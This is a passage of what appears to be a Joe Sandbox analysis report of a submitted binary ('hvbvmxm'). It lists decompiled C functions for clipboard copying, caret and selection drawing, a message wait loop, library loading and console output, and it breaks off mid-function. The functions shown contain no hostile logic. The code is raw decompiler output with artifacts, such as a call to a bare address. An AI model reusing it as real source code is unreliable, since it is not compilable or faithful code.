                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Window$LongMessagePostProcQuit
                                                  • String ID:
                                                  • API String ID: 2284477626-0
                                                  • Opcode ID: 6765d5aaa4f88537f090bb301a433648afaac4aba333ad3edadd88c7d82ac5a7
                                                  • Instruction ID: c02a697f6eeb1a2ee5aa009847c55483d3b6aa878a4a73e3dd73853b162551cd
                                                  • Opcode Fuzzy Hash: 6765d5aaa4f88537f090bb301a433648afaac4aba333ad3edadd88c7d82ac5a7
                                                  • Instruction Fuzzy Hash: 61F12E74A04109EFCB04DF94C684BAEB7B5BF48304F2481AAE545AB392CB39EE41DF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E00402740(intOrPtr _a4) {
                                                  				short* _v8;
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				short _v18;
                                                  				short _v20;
                                                  				short _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				void* _v36;
                                                  				short _v40;
                                                  				short _v44;
                                                  				short _v48;
                                                  				void* _v52;
                                                  				int _t113;
                                                  
                                                  				_t169 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c);
                                                  				asm("cdq");
                                                  				_v32 = ( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) -  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c) ^  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c)) - _t169 + 1;
                                                  				_t171 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e);
                                                  				asm("cdq");
                                                  				_v28 = ( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a)) -  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e) ^  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e)) - _t171 + 1;
                                                  				_t113 = OpenClipboard( *(_a4 + 0xa8));
                                                  				if(_t113 != 0) {
                                                  					EmptyClipboard();
                                                  					_v16 = GlobalAlloc(2, (_v32 + 1) * _v28 << 1);
                                                  					if(_v16 == 0) {
                                                  						L25:
                                                  						return CloseClipboard();
                                                  					}
                                                  					_v36 = GlobalLock(_v16);
                                                  					_v12 = _v36;
                                                  					if(_v12 == 0) {
                                                  						goto L25;
                                                  					}
                                                  					if( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) >=  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c)) {
                                                  						_v40 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c);
                                                  					} else {
                                                  						_v40 =  *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18));
                                                  					}
                                                  					_v20 = _v40;
                                                  					if( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a)) >=  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e)) {
                                                  						_v44 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e);
                                                  					} else {
                                                  						_v44 =  *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a));
                                                  					}
                                                  					_v18 = _v44;
                                                  					_v24 = _v18;
                                                  					while(_v24 < _v18 + _v28) {
                                                  						_v8 = _v12 + _v32 * 2;
                                                  						while(_v8 > _v12 && ( *(_v8 - 2) & 0x0000ffff) == 0x20) {
                                                  							_v8 = _v8 - 2;
                                                  						}
                                                  						if(_v24 >= _v18 + _v28 - 1) {
                                                  							_v48 = 0;
                                                  						} else {
                                                  							_v48 = 0xa;
                                                  						}
                                                  						 *_v8 = _v48;
                                                  						_v12 = _v8 + 2;
                                                  						_v24 = _v24 + 1;
                                                  					}
                                                  					if(_v12 - _v36 >> 1 != (_v32 + 1) * _v28) {
                                                  						_v52 = GlobalReAlloc(_v16, _v12 - _v36 >> 1 << 1, 2);
                                                  						if(_v52 != 0) {
                                                  							_v16 = _v52;
                                                  						}
                                                  					}
                                                  					GlobalUnlock(_v16);
                                                  					SetClipboardData(0xd, _v16);
                                                  					goto L25;
                                                  				}
                                                  				return _t113;
                                                  			}


















                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                                  • String ID:
                                                  • API String ID: 3590494090-0
                                                  • Opcode ID: 6f25ad71efc50c5de9ccdb62d5cf142cb7bcc1685473e82c0973901b690c3ebe
                                                  • Instruction ID: 269373563e95356fc7e10bc16634e1d526d5d1a54b4c283d20d40c66aa4384e6
                                                  • Opcode Fuzzy Hash: 6f25ad71efc50c5de9ccdb62d5cf142cb7bcc1685473e82c0973901b690c3ebe
                                                  • Instruction Fuzzy Hash: CD71FA74A0051ADFCB08DF94C584AEEBBB1FF48305F24C2AAD845AB395D7749A82CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404E90(struct HWND__* _a4, short _a8, short _a10, short _a12, short _a14) {
                                                  				struct HDC__* _v8;
                                                  				struct tagRECT _v24;
                                                  				struct HWND__* _t59;
                                                  				struct HWND__* _t64;
                                                  
                                                  				_t59 = _a8;
                                                  				if(_t59 < 0) {
                                                  					L8:
                                                  					return _t59;
                                                  				}
                                                  				_t59 =  *(_a4 + 8);
                                                  				if(_a8 >=  *((intOrPtr*)(_t59 + 0xc)) || _a12 < 0) {
                                                  					goto L8;
                                                  				}
                                                  				_t59 = _a4;
                                                  				if(_a12 >=  *((intOrPtr*)( *((intOrPtr*)(_t59 + 8)) + 0xc)) || _a10 < 0) {
                                                  					goto L8;
                                                  				}
                                                  				_t59 = _a10;
                                                  				if(_t59 >=  *((intOrPtr*)( *(_a4 + 8) + 0x10))) {
                                                  					goto L8;
                                                  				}
                                                  				_t59 = _a14;
                                                  				if(_t59 < 0) {
                                                  					goto L8;
                                                  				}
                                                  				_t59 =  *(_a4 + 8);
                                                  				if(_a14 >=  *((intOrPtr*)(_t59 + 0x10))) {
                                                  					goto L8;
                                                  				}
                                                  				E00404150(_a4,  &_v24);
                                                  				_v8 = GetDC( *(_a4 + 0xa8));
                                                  				if(_v8 != 0) {
                                                  					if( *(_a4 + 0xa8) == GetFocus() &&  *((intOrPtr*)( *(_a4 + 8) + 0x18)) != 0) {
                                                  						HideCaret( *(_a4 + 0xa8));
                                                  					}
                                                  					InvertRect(_v8,  &_v24);
                                                  				}
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) = _a8;
                                                  				_t64 = _a4;
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x84)) + 0x1c)) = _a12;
                                                  				if(_v8 != 0) {
                                                  					E00404150(_a4,  &_v24);
                                                  					InvertRect(_v8,  &_v24);
                                                  					ReleaseDC( *(_a4 + 0xa8), _v8);
                                                  					_t64 = GetFocus();
                                                  					if( *(_a4 + 0xa8) == _t64) {
                                                  						_t64 =  *(_a4 + 8);
                                                  						if( *((intOrPtr*)(_t64 + 0x18)) != 0) {
                                                  							return ShowCaret( *(_a4 + 0xa8));
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t64;
                                                  			}








                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CaretFocusInvertRect$HideReleaseShow
                                                  • String ID:
                                                  • API String ID: 1353628544-0
                                                  • Opcode ID: 36ba532a911eb452633ff840d2152630db0dde66d080d18bfab3703d5527aacb
                                                  • Instruction ID: 7f274ea54bbecf8e91e2f24ab674b1f30a55f2372a65135cead816cce49e9591
                                                  • Opcode Fuzzy Hash: 36ba532a911eb452633ff840d2152630db0dde66d080d18bfab3703d5527aacb
                                                  • Instruction Fuzzy Hash: 9B410B74200209EFCB08DF54C484AAAB7B5BF88740F10C5A9FA499B791D734EE81DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00404CA0(intOrPtr* _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				void* _v20;
                                                  				long _v24;
                                                  				intOrPtr _v28;
                                                  				char _v36;
                                                  				void* _v48;
                                                  				struct tagMSG _v76;
                                                  				char* _t74;
                                                  				intOrPtr _t87;
                                                  				void* _t112;
                                                  
                                                  				_v20 = 0;
                                                  				_v12 = 0;
                                                  				if(_a8 == 0) {
                                                  					L6:
                                                  					if(E00401AD0(_t90, 0x1000) != 0) {
                                                  						 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) =  *_a4;
                                                  						_v12 = _v12 + 1;
                                                  						if(_a8 != 0) {
                                                  							 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) = _v20;
                                                  							_v12 = _v12 + 1;
                                                  						}
                                                  						if( *((intOrPtr*)(_a4 + 0xac)) != 0) {
                                                  							 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) =  *((intOrPtr*)(_a4 + 0xac));
                                                  							_v12 = _v12 + 1;
                                                  						}
                                                  						L12:
                                                  						L12:
                                                  						if( *((intOrPtr*)(_a4 + 0xa8)) == 0) {
                                                  							_v24 = WaitForMultipleObjects(_v12,  &_v48, 0, 0xffffffff);
                                                  						} else {
                                                  							_v24 = MsgWaitForMultipleObjects(_v12,  &_v48, 0, 0xffffffff, 0x1cff);
                                                  						}
                                                  						if(_v24 != _v12) {
                                                  							goto L21;
                                                  						}
                                                  						while(PeekMessageW( &_v76, 0, 0, 0, 1) != 0) {
                                                  							if(_v76.message != 0x12) {
                                                  								DispatchMessageW( &_v76);
                                                  								continue;
                                                  							}
                                                  							return 0;
                                                  						}
                                                  						goto L12;
                                                  						L21:
                                                  						_v28 = _v24;
                                                  						if(_v28 == 0) {
                                                  							EnterCriticalSection(0x41f57c);
                                                  							_v16 = E004056E0(_a4);
                                                  							LeaveCriticalSection(0x41f57c);
                                                  							if(_v16 == 0) {
                                                  								L32:
                                                  								goto L12;
                                                  							}
                                                  							return 0;
                                                  						}
                                                  						if(_v28 == 1) {
                                                  							_t74 =  &_v36;
                                                  							0x400000(_a8, _v20, 0, 0, _t74,  &_v8, 2, 0, 0);
                                                  							_v16 = _t74;
                                                  							if(_v16 == 0 || _v16 == 0x103) {
                                                  								goto L32;
                                                  							} else {
                                                  								return 1;
                                                  							}
                                                  						}
                                                  						return 0;
                                                  					}
                                                  					return 1;
                                                  				}
                                                  				_v20 = CreateEventW(0, 1, 0, 0);
                                                  				if(_v20 != 0) {
                                                  					_t90 =  &_v36;
                                                  					_t87 = _a8;
                                                  					0x400000(_t87, _v20, 0, 0,  &_v36,  &_v8, 2, 0, 0);
                                                  					_v16 = _t87;
                                                  					if(_v16 == 0 || _v16 == 0x103) {
                                                  						goto L6;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				return 1;
                                                  			}
















                                                  APIs
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00404CC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent
                                                  • String ID:
                                                  • API String ID: 2692171526-0
                                                  • Opcode ID: 4460c440edb5648c1c51148899dbf798a26753bb2803d0fea49b810c808da3ed
                                                  • Instruction ID: b435e695817f24fc916923ad39d26ba6d7574a6bc083f6a686f384be04dcd0ed
                                                  • Opcode Fuzzy Hash: 4460c440edb5648c1c51148899dbf798a26753bb2803d0fea49b810c808da3ed
                                                  • Instruction Fuzzy Hash: 805131B4A00208EBDB14CF94C845FEEB775BF88714F24856AE615B62C0D7789A81CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004122AD(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                  				signed int* _v8;
                                                  				void** _t12;
                                                  				void* _t16;
                                                  				void* _t18;
                                                  				signed int _t22;
                                                  				WCHAR* _t23;
                                                  				void** _t26;
                                                  				signed int* _t29;
                                                  				void* _t32;
                                                  				void* _t34;
                                                  
                                                  				_t29 = _a4;
                                                  				while(_t29 != _a8) {
                                                  					_t22 =  *_t29;
                                                  					_t12 = 0x4219f0 + _t22 * 4;
                                                  					_t32 =  *_t12;
                                                  					_v8 = _t12;
                                                  					if(_t32 == 0) {
                                                  						_t23 =  *(0x419f20 + _t22 * 4);
                                                  						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                  						if(_t32 != 0) {
                                                  							L12:
                                                  							_t26 = _v8;
                                                  							 *_t26 = _t32;
                                                  							if( *_t26 != 0) {
                                                  								FreeLibrary(_t32);
                                                  							}
                                                  							L14:
                                                  							if(_t32 != 0) {
                                                  								_t16 = _t32;
                                                  								L18:
                                                  								return _t16;
                                                  							}
                                                  							L15:
                                                  							_t29 =  &(_t29[1]);
                                                  							continue;
                                                  						}
                                                  						_t18 = GetLastError();
                                                  						if(_t18 != 0x57) {
                                                  							L9:
                                                  							_t32 = 0;
                                                  							L10:
                                                  							if(_t32 != 0) {
                                                  								goto L12;
                                                  							}
                                                  							 *_v8 = _t18 | 0xffffffff;
                                                  							goto L15;
                                                  						}
                                                  						_t18 = E00411D1A(_t23, L"api-ms-", 7);
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = E00411D1A(_t23, L"ext-ms-", 7);
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                  						_t32 = _t18;
                                                  						goto L10;
                                                  					}
                                                  					if(_t32 == 0xffffffff) {
                                                  						goto L15;
                                                  					}
                                                  					goto L14;
                                                  				}
                                                  				_t16 = 0;
                                                  				goto L18;
                                                  			}














                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: 93b5113c307db85f7080e3c0f91dac82c6a8e5627c3d171d788b819ae0736209
                                                  • Instruction ID: 8e270c25f0c40604e1e93508219aae305a9c86a4957ce351f6409ea1989bea42
                                                  • Opcode Fuzzy Hash: 93b5113c307db85f7080e3c0f91dac82c6a8e5627c3d171d788b819ae0736209
                                                  • Instruction Fuzzy Hash: 09210832A01229BBCB224B349E45BDF37589B01760F240126ED25E7390D7BCED9285ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00407A80(void* __eflags, intOrPtr _a4, struct HDC__* _a8) {
                                                  				struct HDC__* _v8;
                                                  				struct HDC__* _v12;
                                                  				struct tagRECT _v28;
                                                  				struct HDC__* _t34;
                                                  				struct HWND__* _t39;
                                                  
                                                  				_t34 = E00404150(_a4,  &_v28);
                                                  				if(_a8 == 0) {
                                                  					_t34 = GetDC( *(_a4 + 0xa8));
                                                  					_v12 = _t34;
                                                  				} else {
                                                  					_v12 = _a8;
                                                  				}
                                                  				_v8 = _v12;
                                                  				if(_v8 == 0) {
                                                  					return _t34;
                                                  				}
                                                  				if( *(_a4 + 0xa8) == GetFocus() &&  *((intOrPtr*)( *(_a4 + 8) + 0x18)) != 0) {
                                                  					HideCaret( *(_a4 + 0xa8));
                                                  				}
                                                  				InvertRect(_v8,  &_v28);
                                                  				if(_v8 != _a8) {
                                                  					ReleaseDC( *(_a4 + 0xa8), _v8);
                                                  				}
                                                  				_t39 = GetFocus();
                                                  				if( *(_a4 + 0xa8) == _t39) {
                                                  					_t39 =  *(_a4 + 8);
                                                  					if( *((intOrPtr*)(_t39 + 0x18)) != 0) {
                                                  						return ShowCaret( *(_a4 + 0xa8));
                                                  					}
                                                  				}
                                                  				return _t39;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CaretFocus$HideInvertRectReleaseShow
                                                  • String ID:
                                                  • API String ID: 4235554027-0
                                                  • Opcode ID: 0a3188828ad0dd766e7147c10e1a667b5d4f81a6aaab61ad355cebeef794b6d8
                                                  • Instruction ID: d0a71b300b41c32ebc3c826b24e0b45d21065f0a536787294a67e111efead58d
                                                  • Opcode Fuzzy Hash: 0a3188828ad0dd766e7147c10e1a667b5d4f81a6aaab61ad355cebeef794b6d8
                                                  • Instruction Fuzzy Hash: 8521DB34A00208EFCB04DF94C488ADE7B75FB88345F24C1AAE9495B391CB35AE85DF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E00413FEC(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				char _v16;
                                                  				char _v23;
                                                  				char _v24;
                                                  				void _v32;
                                                  				signed int _v33;
                                                  				long _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				char _v51;
                                                  				void _v52;
                                                  				long _v56;
                                                  				char _v60;
                                                  				intOrPtr _v68;
                                                  				char _v72;
                                                  				struct _OVERLAPPED* _v76;
                                                  				signed int _v80;
                                                  				signed int _v84;
                                                  				signed int _v88;
                                                  				long _v92;
                                                  				intOrPtr _v96;
                                                  				long _v100;
                                                  				signed char* _v104;
                                                  				signed char* _v108;
                                                  				void* _v112;
                                                  				intOrPtr _v116;
                                                  				char _v120;
                                                  				int _v124;
                                                  				intOrPtr _v128;
                                                  				struct _OVERLAPPED* _v132;
                                                  				struct _OVERLAPPED* _v136;
                                                  				struct _OVERLAPPED* _v140;
                                                  				struct _OVERLAPPED* _v144;
                                                  				signed int _t170;
                                                  				signed int _t172;
                                                  				int _t178;
                                                  				intOrPtr _t183;
                                                  				intOrPtr _t186;
                                                  				void* _t188;
                                                  				void* _t190;
                                                  				long _t193;
                                                  				void _t198;
                                                  				signed char* _t202;
                                                  				void* _t206;
                                                  				struct _OVERLAPPED* _t211;
                                                  				void* _t220;
                                                  				long _t224;
                                                  				intOrPtr _t225;
                                                  				char _t227;
                                                  				void* _t237;
                                                  				struct _OVERLAPPED* _t242;
                                                  				signed int _t244;
                                                  				intOrPtr _t247;
                                                  				signed int _t250;
                                                  				signed int _t251;
                                                  				signed int _t253;
                                                  				intOrPtr _t255;
                                                  				void* _t261;
                                                  				intOrPtr _t262;
                                                  				signed int _t263;
                                                  				signed int _t266;
                                                  				signed char _t267;
                                                  				intOrPtr _t270;
                                                  				signed int _t272;
                                                  				long _t273;
                                                  				signed int _t274;
                                                  				signed char* _t277;
                                                  				signed int _t280;
                                                  				signed int _t282;
                                                  				signed int _t286;
                                                  				signed int _t287;
                                                  				intOrPtr _t288;
                                                  				signed int _t289;
                                                  				struct _OVERLAPPED* _t291;
                                                  				struct _OVERLAPPED* _t293;
                                                  				signed int _t294;
                                                  				void* _t295;
                                                  				void* _t296;
                                                  
                                                  				_t170 =  *0x41f638; // 0x3fbdb919
                                                  				_v8 = _t170 ^ _t294;
                                                  				_t172 = _a8;
                                                  				_t266 = _t172 >> 6;
                                                  				_t244 = (_t172 & 0x0000003f) * 0x38;
                                                  				_t277 = _a12;
                                                  				_v108 = _t277;
                                                  				_v80 = _t266;
                                                  				_v112 =  *((intOrPtr*)(_t244 +  *((intOrPtr*)(0x4217e8 + _t266 * 4)) + 0x18));
                                                  				_v44 = _t244;
                                                  				_v96 = _a16 + _t277;
                                                  				_t178 = GetConsoleOutputCP();
                                                  				_t242 = 0;
                                                  				_v124 = _t178;
                                                  				E0040E270( &_v72, _t266, 0);
                                                  				_t282 = 0;
                                                  				_v92 = 0;
                                                  				_v88 = 0;
                                                  				_v84 = 0;
                                                  				_t247 =  *((intOrPtr*)(_v68 + 8));
                                                  				_v128 = _t247;
                                                  				_v104 = _t277;
                                                  				if(_t277 >= _v96) {
                                                  					L48:
                                                  					__eflags = _v60 - _t242;
                                                  				} else {
                                                  					while(1) {
                                                  						_t250 = _v44;
                                                  						_v51 =  *_t277;
                                                  						_v76 = _t242;
                                                  						_v40 = 1;
                                                  						_t186 =  *((intOrPtr*)(0x4217e8 + _v80 * 4));
                                                  						_v48 = _t186;
                                                  						if(_t247 != 0xfde9) {
                                                  							goto L19;
                                                  						}
                                                  						_t211 = _t242;
                                                  						_t270 = _v48 + 0x2e + _t250;
                                                  						_v116 = _t270;
                                                  						while( *((intOrPtr*)(_t270 + _t211)) != _t242) {
                                                  							_t211 =  &(_t211->Internal);
                                                  							if(_t211 < 5) {
                                                  								continue;
                                                  							}
                                                  							break;
                                                  						}
                                                  						_t272 = _v96 - _t277;
                                                  						_v40 = _t211;
                                                  						if(_t211 <= 0) {
                                                  							_t72 = ( *_t277 & 0x000000ff) + 0x41fd78; // 0x0
                                                  							_t255 =  *_t72 + 1;
                                                  							_v48 = _t255;
                                                  							__eflags = _t255 - _t272;
                                                  							if(_t255 > _t272) {
                                                  								__eflags = _t272;
                                                  								if(_t272 <= 0) {
                                                  									goto L40;
                                                  								} else {
                                                  									_t287 = _v44;
                                                  									do {
                                                  										 *((char*)( *((intOrPtr*)(0x4217e8 + _v80 * 4)) + _t287 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t277));
                                                  										_t242 =  &(_t242->Internal);
                                                  										__eflags = _t242 - _t272;
                                                  									} while (_t242 < _t272);
                                                  									goto L39;
                                                  								}
                                                  							} else {
                                                  								_v144 = _t242;
                                                  								__eflags = _t255 - 4;
                                                  								_v140 = _t242;
                                                  								_v56 = _t277;
                                                  								_v40 = (_t255 == 4) + 1;
                                                  								_t220 = E00414D3E( &_v144,  &_v76,  &_v56, (_t255 == 4) + 1,  &_v144);
                                                  								_t296 = _t295 + 0x10;
                                                  								__eflags = _t220 - 0xffffffff;
                                                  								if(_t220 == 0xffffffff) {
                                                  									goto L48;
                                                  								} else {
                                                  									_t288 = _v48;
                                                  									goto L18;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t224 =  *((char*)(( *(_t250 + _v48 + 0x2e) & 0x000000ff) + 0x41fd78)) + 1;
                                                  							_v56 = _t224;
                                                  							_t225 = _t224 - _v40;
                                                  							_v48 = _t225;
                                                  							if(_t225 > _t272) {
                                                  								__eflags = _t272;
                                                  								if(_t272 > 0) {
                                                  									_t289 = _t250;
                                                  									do {
                                                  										_t227 =  *((intOrPtr*)(_t242 + _t277));
                                                  										_t261 =  *((intOrPtr*)(0x4217e8 + _v80 * 4)) + _t289 + _t242;
                                                  										_t242 =  &(_t242->Internal);
                                                  										 *((char*)(_t261 + _v40 + 0x2e)) = _t227;
                                                  										_t289 = _v44;
                                                  										__eflags = _t242 - _t272;
                                                  									} while (_t242 < _t272);
                                                  									L39:
                                                  									_t282 = _v88;
                                                  								}
                                                  								L40:
                                                  								_t286 = _t282 + _t272;
                                                  								__eflags = _t286;
                                                  								L41:
                                                  								__eflags = _v60;
                                                  								_v88 = _t286;
                                                  							} else {
                                                  								_t273 = _v40;
                                                  								_t291 = _t242;
                                                  								_t262 = _v116;
                                                  								do {
                                                  									 *((char*)(_t294 + _t291 - 0xc)) =  *((intOrPtr*)(_t262 + _t291));
                                                  									_t291 =  &(_t291->Internal);
                                                  								} while (_t291 < _t273);
                                                  								_t292 = _v48;
                                                  								_t263 = _v44;
                                                  								if(_v48 > 0) {
                                                  									E0040CC90( &_v16 + _t273, _t277, _t292);
                                                  									_t263 = _v44;
                                                  									_t295 = _t295 + 0xc;
                                                  									_t273 = _v40;
                                                  								}
                                                  								_t280 = _v80;
                                                  								_t293 = _t242;
                                                  								do {
                                                  									 *( *((intOrPtr*)(0x4217e8 + _t280 * 4)) + _t263 + _t293 + 0x2e) = _t242;
                                                  									_t293 =  &(_t293->Internal);
                                                  								} while (_t293 < _t273);
                                                  								_t277 = _v104;
                                                  								_t288 = _v48;
                                                  								_v120 =  &_v16;
                                                  								_v136 = _t242;
                                                  								_v132 = _t242;
                                                  								_v40 = (_v56 == 4) + 1;
                                                  								_t237 = E00414D3E( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
                                                  								_t296 = _t295 + 0x10;
                                                  								if(_t237 == 0xffffffff) {
                                                  									goto L48;
                                                  								} else {
                                                  									L18:
                                                  									_t277 = _t277 - 1 + _t288;
                                                  									L27:
                                                  									_t277 =  &(_t277[1]);
                                                  									_v104 = _t277;
                                                  									_t193 = E00410EAF(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
                                                  									_t295 = _t296 + 0x20;
                                                  									_v56 = _t193;
                                                  									if(_t193 == 0) {
                                                  										goto L48;
                                                  									} else {
                                                  										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
                                                  											L47:
                                                  											_v92 = GetLastError();
                                                  											goto L48;
                                                  										} else {
                                                  											_t282 = _v84 - _v108 + _t277;
                                                  											_v88 = _t282;
                                                  											if(_v100 < _v56) {
                                                  												goto L48;
                                                  											} else {
                                                  												if(_v51 != 0xa) {
                                                  													L34:
                                                  													if(_t277 >= _v96) {
                                                  														goto L48;
                                                  													} else {
                                                  														_t247 = _v128;
                                                  														continue;
                                                  													}
                                                  												} else {
                                                  													_t198 = 0xd;
                                                  													_v52 = _t198;
                                                  													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
                                                  														goto L47;
                                                  													} else {
                                                  														if(_v100 < 1) {
                                                  															goto L48;
                                                  														} else {
                                                  															_v84 = _v84 + 1;
                                                  															_t282 = _t282 + 1;
                                                  															_v88 = _t282;
                                                  															goto L34;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
